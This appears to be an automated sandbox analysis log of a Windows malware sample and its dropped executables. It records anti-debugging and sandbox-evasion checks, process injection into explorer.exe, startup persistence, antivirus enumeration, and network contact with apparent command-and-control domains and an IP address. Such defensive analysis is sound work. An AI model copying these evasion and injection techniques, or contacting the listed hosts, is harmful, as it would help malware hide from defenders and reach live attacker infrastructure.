Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\A329.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 664	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 602	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 795	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 357	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 569	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Window / User API: threadDelayed 979	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Window / User API: threadDelayed 3325	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\AD1D.exe

Registry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Windows\explorer.exe TID: 5468	Thread sleep time: -60200s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6080	Thread sleep time: -79500s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2124	Thread sleep time: -56900s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A329.exe TID: 5124	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe TID: 5364	Thread sleep time: -56000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe TID: 7684	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe TID: 7684	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe TID: 6984	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe TID: 5980	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\AD1D.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: 21_2_0040C9F7 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,	21_2_0040C9F7
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: 21_2_0041DB78 FindFirstFileExW,	21_2_0041DB78
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: 21_2_02EFCC47 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,	21_2_02EFCC47
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: 21_2_02F0DDC8 FindFirstFileExW,	21_2_02F0DDC8

Source: C:\Users\user\AppData\Local\Temp\A329.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: explorer.exe, 00000006.00000000.228854841.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000006.00000000.228854841.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: explorer.exe, 00000006.00000000.229247093.00000000088BF000.00000004.00000001.sdmp	Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.223589626.00000000055D0000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.228001239.0000000008220000.00000002.00000001.sdmp, WerFault.exe, 0000001B.00000002.353885004.0000000004DA0000.00000002.00000001.sdmp, WerFault.exe, 00000022.00000002.394174387.0000000004CC0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000006.00000000.228411876.0000000008640000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: 9675.exe, 00000015.00000000.394413430.0000000002F85000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\
Source: explorer.exe, 00000006.00000000.223589626.00000000055D0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: explorer.exe, 00000006.00000000.228854841.000000000871F000.00000004.00000001.sdmp	Binary or memory string: _VMware_SATA_CD00#5&K
Source: WerFault.exe, 00000022.00000003.390293491.000000000309E000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000006.00000000.228854841.000000000871F000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 00000006.00000000.228854841.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: 9675.exe, 00000015.00000000.359061358.0000000002F85000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}K
Source: 9675.exe, 00000015.00000000.370931654.0000000002F85000.00000004.00000001.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:9yy-7
Source: explorer.exe, 00000006.00000000.228961223.00000000087D1000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00ices
Source: explorer.exe, 00000006.00000000.244835287.0000000005603000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: WerFault.exe, 00000022.00000002.392977691.0000000002FE8000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAWp[
Source: explorer.exe, 00000006.00000000.228001239.0000000008220000.00000002.00000001.sdmp, WerFault.exe, 0000001B.00000002.353885004.0000000004DA0000.00000002.00000001.sdmp, WerFault.exe, 00000022.00000002.394174387.0000000004CC0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000006.00000000.228001239.0000000008220000.00000002.00000001.sdmp, WerFault.exe, 0000001B.00000002.353885004.0000000004DA0000.00000002.00000001.sdmp, WerFault.exe, 00000022.00000002.394174387.0000000004CC0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000006.00000000.228001239.0000000008220000.00000002.00000001.sdmp, WerFault.exe, 0000001B.00000002.353885004.0000000004DA0000.00000002.00000001.sdmp, WerFault.exe, 00000022.00000002.394174387.0000000004CC0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\IuXJUPoEo6.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\IuXJUPoEo6.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Show sources

Source: C:\Users\user\Desktop\IuXJUPoEo6.exe	System information queried: CodeIntegrityInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\ehdjcua	System information queried: CodeIntegrityInformation			Jump to behavior

Hides threads from debuggers

Show sources

Source: C:\Users\user\AppData\Local\Temp\AD1D.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Show sources

Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\IuXJUPoEo6.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ehdjcua	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\IuXJUPoEo6.exe

Code function: 4_2_004026C4 LdrLoadDll,

4_2_004026C4

Source: C:\Users\user\Desktop\IuXJUPoEo6.exe

Code function: 1_2_00405370 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

1_2_00405370

Source: C:\Users\user\Desktop\IuXJUPoEo6.exe

1_2_00414C50

Source: C:\Users\user\Desktop\IuXJUPoEo6.exe	Code function: 1_2_00C4572C push dword ptr fs:[00000030h]	1_2_00C4572C
Source: C:\Users\user\AppData\Roaming\ehdjcua	Code function: 15_2_009E0042 push dword ptr fs:[00000030h]	15_2_009E0042
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: 21_2_00412260 mov eax, dword ptr fs:[00000030h]	21_2_00412260
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: 21_2_00418392 mov eax, dword ptr fs:[00000030h]	21_2_00418392
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: 21_2_02EF092B mov eax, dword ptr fs:[00000030h]	21_2_02EF092B
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: 21_2_02F024B0 mov eax, dword ptr fs:[00000030h]	21_2_02F024B0
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: 21_2_02F085E2 mov eax, dword ptr fs:[00000030h]	21_2_02F085E2
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: 21_2_02EF0D90 mov eax, dword ptr fs:[00000030h]	21_2_02EF0D90
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: 21_2_02F47B63 push dword ptr fs:[00000030h]	21_2_02F47B63

Source: C:\Users\user\AppData\Local\Temp\9675.exe

Code function: 21_2_00421283 GetProcessHeap,

21_2_00421283

Source: C:\Users\user\AppData\Local\Temp\A329.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\IuXJUPoEo6.exe	Code function: 1_2_00405370 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00405370
Source: C:\Users\user\Desktop\IuXJUPoEo6.exe	Code function: 1_2_0040F690 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_0040F690
Source: C:\Users\user\Desktop\IuXJUPoEo6.exe	Code function: 1_2_0041D410 _memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_0041D410
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: 21_2_0040E81D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_0040E81D
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: 21_2_004139F5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_004139F5
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: 21_2_0040E980 SetUnhandledExceptionFilter,	21_2_0040E980
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: 21_2_0040EA95 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	21_2_0040EA95
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: 21_2_02EFEA6D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_02EFEA6D
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: 21_2_02EFEBD0 SetUnhandledExceptionFilter,	21_2_02EFEBD0
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: 21_2_02EFECE5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	21_2_02EFECE5
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: 21_2_02F03C45 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_02F03C45

Source: C:\Users\user\AppData\Local\Temp\A329.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files

Show sources

Source: C:\Windows\explorer.exe

File created: ehdjcua.6.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: readinglistforjuly1.xyz
Source: C:\Windows\explorer.exe	Domain query: readinglistforjuly2.xyz
Source: C:\Windows\explorer.exe	Network Connect: 91.241.19.52 80	Jump to behavior

Contains functionality to inject code into remote processes

Show sources

Source: C:\Users\user\AppData\Roaming\ehdjcua

Code function: 15_2_009E0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,

15_2_009E0110

Creates a thread in another existing process (thread injection)

Show sources

Source: C:\Users\user\Desktop\IuXJUPoEo6.exe	Thread created: C:\Windows\explorer.exe EIP: 3261EAC			Jump to behavior
Source: C:\Users\user\AppData\Roaming\ehdjcua	Thread created: unknown EIP: 4BB1EAC			Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\AppData\Roaming\ehdjcua	Memory written: C:\Users\user\AppData\Roaming\ehdjcua base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Memory written: C:\Users\user\AppData\Local\Temp\A329.exe base: 400000 value starts with: 4D5A			Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\IuXJUPoEo6.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\IuXJUPoEo6.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ehdjcua	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ehdjcua	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior

Source: C:\Users\user\Desktop\IuXJUPoEo6.exe	Process created: C:\Users\user\Desktop\IuXJUPoEo6.exe 'C:\Users\user\Desktop\IuXJUPoEo6.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ehdjcua	Process created: C:\Users\user\AppData\Roaming\ehdjcua C:\Users\user\AppData\Roaming\ehdjcua	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9C52.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /Q /C C:\Users\user\AppData\Local\Temp/s.bat	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Process created: C:\Users\user\AppData\Local\Temp\A329.exe C:\Users\user\AppData\Local\Temp\A329.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe	Process created: unknown unknown

Source: explorer.exe, 00000006.00000000.216904167.0000000001398000.00000004.00000020.sdmp	Binary or memory string: ProgmanamF
Source: explorer.exe, 00000006.00000000.238519218.0000000001980000.00000002.00000001.sdmp, 9675.exe, 00000015.00000000.387239836.00000000034C0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000006.00000000.238519218.0000000001980000.00000002.00000001.sdmp, 9675.exe, 00000015.00000000.387239836.00000000034C0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.238519218.0000000001980000.00000002.00000001.sdmp, 9675.exe, 00000015.00000000.387239836.00000000034C0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000006.00000000.238519218.0000000001980000.00000002.00000001.sdmp, 9675.exe, 00000015.00000000.387239836.00000000034C0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\AppData\Local\Temp\9675.exe

Code function: 21_2_0040EC97 cpuid

21_2_0040EC97

Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	21_2_00421021
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: EnumSystemLocalesW,	21_2_00420962
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: EnumSystemLocalesW,	21_2_004209AD
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: EnumSystemLocalesW,	21_2_00420A48
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: EnumSystemLocalesW,	21_2_0041AA26
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	21_2_00420AD3
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: GetLocaleInfoW,	21_2_00420D26
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	21_2_00420E4C
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	21_2_004206C0
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: GetLocaleInfoW,	21_2_0041AF48
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: GetLocaleInfoW,	21_2_00420F52
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	21_2_02F11271
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: EnumSystemLocalesW,	21_2_02F10BFD
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: EnumSystemLocalesW,	21_2_02F10BB2
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	21_2_02F1109C
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: GetLocaleInfoW,	21_2_02F111A2
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: GetLocaleInfoW,	21_2_02F0B198
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	21_2_02F10910
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: GetLocaleInfoW,	21_2_02F10F76
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: EnumSystemLocalesW,	21_2_02F10C98
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: EnumSystemLocalesW,	21_2_02F0AC76
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	21_2_02F10D23

Source: C:\Users\user\AppData\Local\Temp\A329.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\A329.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\IuXJUPoEo6.exe

Code function: 1_2_004096E0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

1_2_004096E0

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
